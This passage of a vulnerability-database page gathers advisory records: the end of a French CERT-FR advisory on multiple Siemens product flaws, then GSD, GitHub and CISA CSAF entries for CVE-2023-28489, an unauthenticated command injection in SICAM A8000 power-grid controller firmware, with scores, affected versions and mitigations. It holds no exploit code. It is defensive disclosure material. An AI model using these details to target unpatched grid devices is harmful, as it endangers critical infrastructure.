"scada": true
}
}
},
{
"description": "SIMATIC CP 443-1 Advanced versions ant\u00e9rieures \u00e0 V3.2.17",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "SIMATIC CP 343-1 Advanced versions ant\u00e9rieures \u00e0 V3.0.53",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V14.0 versions ant\u00e9rieures \u00e0 V14.0.0.5",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "SCALANCE XCM332 (6GK5332-0GA01-2AC2) versions ant\u00e9rieures \u00e0 V2.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "JT Open versions ant\u00e9rieures \u00e0 V11.3.2.0",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V14.2 versions ant\u00e9rieures \u00e0 V14.2.0.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Mendix Forgot Password (Mendix 7 compatible) versions ant\u00e9rieures \u00e0 V3.7.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "JT Utilities versions ant\u00e9rieures \u00e0 V13.3.0.0",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V13.3 versions ant\u00e9rieures \u00e0 V13.3.0.9",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "OpenPCS 7 V9.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "SIMATIC S7-300 CPU family versions ant\u00e9rieures \u00e0 V3.X.18",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V14.1 versions ant\u00e9rieures \u00e0 V14.1.0.7",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2022-35252",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35252"
},
{
"name": "CVE-2023-28828",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28828"
},
{
"name": "CVE-2016-8673",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-8673"
},
{
"name": "CVE-2020-35198",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35198"
},
{
"name": "CVE-2022-32208",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32208"
},
{
"name": "CVE-2023-28766",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28766"
},
{
"name": "CVE-2021-27044",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-27044"
},
{
"name": "CVE-2022-1652",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1652"
},
{
"name": "CVE-2022-32207",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32207"
},
{
"name": "CVE-2023-29053",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29053"
},
{
"name": "CVE-2023-28489",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28489"
},
{
"name": "CVE-2022-43767",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43767"
},
{
"name": "CVE-2022-44725",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44725"
},
{
"name": "CVE-2023-29054",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29054"
},
{
"name": "CVE-2023-23588",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23588"
},
{
"name": "CVE-2021-46828",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46828"
},
{
"name": "CVE-2016-8672",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-8672"
},
{
"name": "CVE-2023-26293",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26293"
},
{
"name": "CVE-2022-40674",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40674"
},
{
"name": "CVE-2022-43716",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43716"
},
{
"name": "CVE-2022-32205",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32205"
},
{
"name": "CVE-2022-32206",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32206"
},
{
"name": "CVE-2022-1729",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1729"
},
{
"name": "CVE-2022-43768",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43768"
},
{
"name": "CVE-2023-27464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27464"
},
{
"name": "CVE-2020-28895",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28895"
},
{
"name": "CVE-2023-1709",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1709"
},
{
"name": "CVE-2022-30065",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30065"
}
],
"links": [],
"reference": "CERTFR-2023-AVI-0298",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2023-04-11T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nSiemens. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer\nune ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0\ndistance et un contournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Siemens",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-699404 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-699404.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-479249 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-479249.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-572164 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-572164.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-691715 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-691715.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-511182 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-511182.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-566905 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-566905.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-642810 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-642810.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-603476 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-603476.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-813746 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-813746.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-629917 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-629917.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-558014 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-558014.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-322980 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-322980.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-116924 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-116924.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-632164 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-632164.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-472454 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-472454.html"
}
]
}
GSD-2023-28489
Vulnerability from gsd - Updated: 2023-12-13 01:20Details
A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter “Remote Operation” is enabled. The parameter is disabled by default.
The vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2023-28489",
"id": "GSD-2023-28489"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2023-28489"
],
"details": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default.\r\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.",
"id": "GSD-2023-28489",
"modified": "2023-12-13T01:20:48.940682Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "productcert@siemens.com",
"ID": "CVE-2023-28489",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "CP-8031 MASTER MODULE",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "All versions \u003c CPCI85 V05"
}
]
}
},
{
"product_name": "CP-8050 MASTER MODULE",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "All versions \u003c CPCI85 V05"
}
]
}
}
]
},
"vendor_name": "Siemens"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default.\r\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device."
}
]
},
"impact": {
"cvss": [
{
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-77",
"lang": "eng",
"value": "CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf",
"refsource": "MISC",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
},
{
"name": "http://seclists.org/fulldisclosure/2023/Jul/14",
"refsource": "MISC",
"url": "http://seclists.org/fulldisclosure/2023/Jul/14"
},
{
"name": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
}
]
}
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:siemens:cp-8031_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "cpci85_v05",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:siemens:cp-8031:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:siemens:cp-8050_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "cpci85_v05",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:siemens:cp-8050:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "productcert@siemens.com",
"ID": "CVE-2023-28489"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default.\r\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf",
"refsource": "MISC",
"tags": [
"Vendor Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
},
{
"name": "http://seclists.org/fulldisclosure/2023/Jul/14",
"refsource": "MISC",
"tags": [],
"url": "http://seclists.org/fulldisclosure/2023/Jul/14"
},
{
"name": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html",
"refsource": "MISC",
"tags": [],
"url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
}
]
}
},
"impact": {
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9
}
},
"lastModifiedDate": "2023-07-11T18:15Z",
"publishedDate": "2023-04-11T10:15Z"
}
}
}
GHSA-X9QV-5M74-X74P
Vulnerability from github – Published: 2023-07-06 19:24 – Updated: 2023-07-11 18:31
VLAI?
Details
A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter “Remote Operation” is enabled. The parameter is disabled by default. The vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.
Severity ?
9.8 (Critical)
{
"affected": [],
"aliases": [
"CVE-2023-28489"
],
"database_specific": {
"cwe_ids": [
"CWE-77"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-04-11T10:15:00Z",
"severity": "CRITICAL"
},
"details": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default.\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.",
"id": "GHSA-x9qv-5m74-x74p",
"modified": "2023-07-11T18:31:19Z",
"published": "2023-07-06T19:24:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28489"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2023/Jul/14"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
ICSA-23-103-07
Vulnerability from csaf_cisa - Published: 2023-04-11 00:00 - Updated: 2023-04-11 00:00Summary
Siemens CPCI85 Firmware of SICAM A8000 Devices
Notes
Summary
The CPCI85 firmware of SICAM A8000 CP-8031 and CP-8050 is affected by unauthenticated command injection vulnerability. This could allow an attacker to perfom remote code execution.
Siemens has released updates for the affected products and recommends to update to the latest versions.
General Recommendations
Operators of critical power systems (e.g. TSOs or DSOs) worldwide are usually required by regulations to build resilience into the power grids by applying multi-level redundant secondary protection schemes. It is therefore recommended that the operators check whether appropriate resilient protection measures are in place. The risk of cyber incidents impacting the grid's reliability can thus be minimized by virtue of the grid design.
Siemens strongly recommends applying the provided security updates using the corresponding tooling and documented procedures made available with the product. If supported by the product, an automated means to apply the security updates across multiple product instances may be used. Siemens strongly recommends prior validation of any security update before being applied, and supervision by trained staff of the update process in the target environment.
As a general security measure Siemens strongly recommends to protect network access with appropriate mechanisms (e.g. firewalls, segmentation, VPN). It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment.
Recommended security guidelines can be found at:
https://www.siemens.com/gridsecurity
Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories
Terms of Use
Siemens Security Advisories are subject to the terms and conditions contained in Siemens' underlying license terms or other applicable agreements previously agreed to with Siemens (hereinafter "License Terms"). To the extent applicable to information, software or documentation made available in or through a Siemens Security Advisory, the Terms of Use of Siemens' Global Website (https://www.siemens.com/terms_of_use, hereinafter "Terms of Use"), in particular Sections 8-10 of the Terms of Use, shall apply additionally. In case of conflicts, the License Terms shall prevail over the Terms of Use.
Legal Notice
All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.
Advisory Conversion Disclaimer
This CISA CSAF advisory was converted from Siemens ProductCERT's CSAF advisory.
Critical infrastructure sectors
Multiple
Countries/areas deployed
Worldwide
Company headquarters location
Germany
Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.
Recommended Practices
Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
Recommended Practices
Locate control system networks and remote devices behind firewalls and isolate them from business networks.
Recommended Practices
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.
Recommended Practices
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
Recommended Practices
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
Recommended Practices
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Recommended Practices
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
{
"document": {
"acknowledgments": [
{
"organization": "Siemens ProductCERT",
"summary": "reporting this vulnerability to CISA."
}
],
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Disclosure is not limited",
"tlp": {
"label": "WHITE",
"url": "https://us-cert.cisa.gov/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The CPCI85 firmware of SICAM A8000 CP-8031 and CP-8050 is affected by unauthenticated command injection vulnerability. This could allow an attacker to perfom remote code execution.\n\nSiemens has released updates for the affected products and recommends to update to the latest versions.",
"title": "Summary"
},
{
"category": "general",
"text": "Operators of critical power systems (e.g. TSOs or DSOs) worldwide are usually required by regulations to build resilience into the power grids by applying multi-level redundant secondary protection schemes. It is therefore recommended that the operators check whether appropriate resilient protection measures are in place. The risk of cyber incidents impacting the grid\u0027s reliability can thus be minimized by virtue of the grid design.\nSiemens strongly recommends applying the provided security updates using the corresponding tooling and documented procedures made available with the product. If supported by the product, an automated means to apply the security updates across multiple product instances may be used. Siemens strongly recommends prior validation of any security update before being applied, and supervision by trained staff of the update process in the target environment. \nAs a general security measure Siemens strongly recommends to protect network access with appropriate mechanisms (e.g. firewalls, segmentation, VPN). It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment.\n\nRecommended security guidelines can be found at:\n\nhttps://www.siemens.com/gridsecurity",
"title": "General Recommendations"
},
{
"category": "general",
"text": "For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "Siemens Security Advisories are subject to the terms and conditions contained in Siemens\u0027 underlying license terms or other applicable agreements previously agreed to with Siemens (hereinafter \"License Terms\"). To the extent applicable to information, software or documentation made available in or through a Siemens Security Advisory, the Terms of Use of Siemens\u0027 Global Website (https://www.siemens.com/terms_of_use, hereinafter \"Terms of Use\"), in particular Sections 8-10 of the Terms of Use, shall apply additionally. In case of conflicts, the License Terms shall prevail over the Terms of Use.",
"title": "Terms of Use"
},
{
"category": "legal_disclaimer",
"text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.",
"title": "Legal Notice"
},
{
"category": "other",
"text": "This CISA CSAF advisory was converted from Siemens ProductCERT\u0027s CSAF advisory.",
"title": "Advisory Conversion Disclaimer"
},
{
"category": "other",
"text": "Multiple",
"title": "Critical infrastructure sectors"
},
{
"category": "other",
"text": "Worldwide",
"title": "Countries/areas deployed"
},
{
"category": "other",
"text": "Germany",
"title": "Company headquarters location"
},
{
"category": "general",
"text": "CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Locate control system networks and remote devices behind firewalls and isolate them from business networks.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.",
"title": "Recommended Practices"
}
],
"publisher": {
"category": "other",
"contact_details": "central@cisa.dhs.gov",
"name": "CISA",
"namespace": "https://www.cisa.gov/"
},
"references": [
{
"category": "self",
"summary": "SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices - CSAF Version",
"url": "https://cert-portal.siemens.com/productcert/csaf/ssa-472454.json"
},
{
"category": "self",
"summary": "SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices - HTML Version",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-472454.html"
},
{
"category": "self",
"summary": "SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices - PDF Version",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
},
{
"category": "self",
"summary": "SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices - TXT Version",
"url": "https://cert-portal.siemens.com/productcert/txt/ssa-472454.txt"
},
{
"category": "self",
"summary": "ICS Advisory ICSA-23-103-07 JSON",
"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2023/icsa-23-103-07.json"
},
{
"category": "self",
"summary": "ICS Advisory ICSA-23-103-07 - Web Version",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-103-07"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/topics/industrial-control-systems"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/sites/default/files/publications/Cybersecurity_Best_Practices_for_Industrial_Control_Systems.pdf"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B"
}
],
"title": "Siemens CPCI85 Firmware of SICAM A8000 Devices",
"tracking": {
"current_release_date": "2023-04-11T00:00:00.000000Z",
"generator": {
"engine": {
"name": "CISA CSAF Generator",
"version": "1.0.0"
}
},
"id": "ICSA-23-103-07",
"initial_release_date": "2023-04-11T00:00:00.000000Z",
"revision_history": [
{
"date": "2023-04-11T00:00:00.000000Z",
"legacy_version": "1.0",
"number": "1",
"summary": "Publication Date"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cvers:/_CPCI85_V05",
"product": {
"name": "CP-8031 MASTER MODULE (6MF2803-1AA00)",
"product_id": "CSAFPID-0001",
"product_identification_helper": {
"model_numbers": [
"6MF2803-1AA00"
]
}
}
}
],
"category": "product_name",
"name": "CP-8031 MASTER MODULE (6MF2803-1AA00)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cvers:/_CPCI85_V05",
"product": {
"name": "CP-8050 MASTER MODULE (6MF2805-0AA00)",
"product_id": "CSAFPID-0002",
"product_identification_helper": {
"model_numbers": [
"6MF2805-0AA00"
]
}
}
}
],
"category": "product_name",
"name": "CP-8050 MASTER MODULE (6MF2805-0AA00)"
}
],
"category": "vendor",
"name": "Siemens"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-28489",
"cwe": {
"id": "CWE-77",
"name": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
},
"notes": [
{
"category": "summary",
"text": "Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default.\r\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001",
"CSAFPID-0002"
]
},
"remediations": [
{
"category": "mitigation",
"details": "Limit access to the web server on port 80/TCP and 443/TCP with an external firewall.",
"product_ids": [
"CSAFPID-0001",
"CSAFPID-0002"
]
},
{
"category": "vendor_fix",
"details": "Update to CPCI85 V05 or later version",
"product_ids": [
"CSAFPID-0001"
],
"url": "https://support.industry.siemens.com/cs/ww/en/view/109804985/"
},
{
"category": "vendor_fix",
"details": "Update to CPCI85 V05 or later version",
"product_ids": [
"CSAFPID-0002"
],
"url": "https://support.industry.siemens.com/cs/ww/en/view/109804985/"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C",
"version": "3.1"
},
"products": [
"CSAFPID-0001",
"CSAFPID-0002"
]
}
],
"title": "CVE-2023-28489"
}
]
}
Loading…
Loading…
Sightings
